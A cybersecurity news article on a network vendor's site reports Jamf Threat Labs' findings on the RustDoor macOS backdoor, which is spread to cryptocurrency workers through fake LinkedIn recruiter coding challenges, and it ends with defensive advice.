Platform
Platform
Everything you need to run a secure global network—in a single system.
Solutions
Solutions
Learn how our solutions were designed to help you scale your IT resources
Company
CommandLink
Let's talk about how we can help you!
Partners
Date: September 16, 2024
Cybersecurity researchers are raising alarms about threat actors targeting cryptocurrency users on LinkedIn using malware known as RustDoor. The latest warning comes from Jamf Threat Labs, which identified an attack where a user was approached on LinkedIn by someone posing as a recruiter from STON.fi, a legitimate decentralized cryptocurrency exchange (DEX).
These cyberattacks are part of a larger trend involving "highly tailored, difficult-to-detect social engineering campaigns," as highlighted by the U.S. Federal Bureau of Investigation (FBI). The attacks focus on employees in decentralized finance (DeFi), cryptocurrency, and related industries. One common tactic involves asking targets to execute code or download applications on devices with access to company networks.
Another tactic involves requesting victims to take part in pre-employment tests or debugging exercises. These exercises often require executing suspicious Node.js or PyPI packages, scripts, or GitHub repositories, potentially exposing the target's systems to malware.
In the most recent attack uncovered by Jamf Threat Labs, victims are tricked into downloading a compromised Visual Studio project as part of a fake coding challenge. Embedded in this project are malicious bash commands designed to download two second-stage payloads—VisualStudioHelper and zsh_env. Both payloads serve as backdoors with identical functions.
This second-stage malware, known as RustDoor (or Thiefbucket, as tracked by Jamf), is a macOS backdoor. None of the major anti-malware engines have flagged the infected zipped coding test file as malicious, though it was uploaded to VirusTotal on August 7, 2024.
According to Jamf researchers Jaron Bradley and Ferdous Saljooki, RustDoor persists on infected systems via cron jobs and the zshrc file, allowing it to maintain access even after reboots. The malware was first documented by Bitdefender in February 2024, targeting cryptocurrency firms. Later research by S2W uncovered a variant written in Golang aimed at infecting Windows machines.
The RustDoor malware is particularly concerning not only because it has now been attributed to North Korean threat actors, but also because it is written in Objective-C, a language commonly used for macOS development. This adds a layer of complexity and makes the malware harder to detect.
VisualStudioHelper, one of the two payloads, also acts as an information stealer. It harvests specific files based on the malware’s configuration, disguising its activity as a legitimate prompt from the Visual Studio application. This trick prompts users to enter their system password, making the attack even more difficult to spot.
Both RustDoor payloads function as backdoors, communicating with command-and-control (C2) servers via two distinct channels.
The research highlights the growing sophistication of cybercriminals targeting the cryptocurrency sector. According to Jamf Threat Labs, attackers are using advanced social engineering schemes and are well-versed in English, often thoroughly researching their targets before initiating contact.
The researchers stress the importance of cybersecurity training, particularly for developers and other employees in the cryptocurrency space. Users should be cautious when engaging with unknown contacts on social media, especially if asked to run software.
“Threat actors continue to evolve their methods to target the crypto industry,” the researchers said. “Training your employees to be suspicious of unsolicited requests to run software is key to preventing these types of attacks.”
North Korean cyber actors continue to pose a significant threat to the cryptocurrency industry, using advanced techniques to infiltrate companies and steal valuable assets. Organizations are urged to remain vigilant and implement strict cybersecurity protocols to protect against these emerging threats.
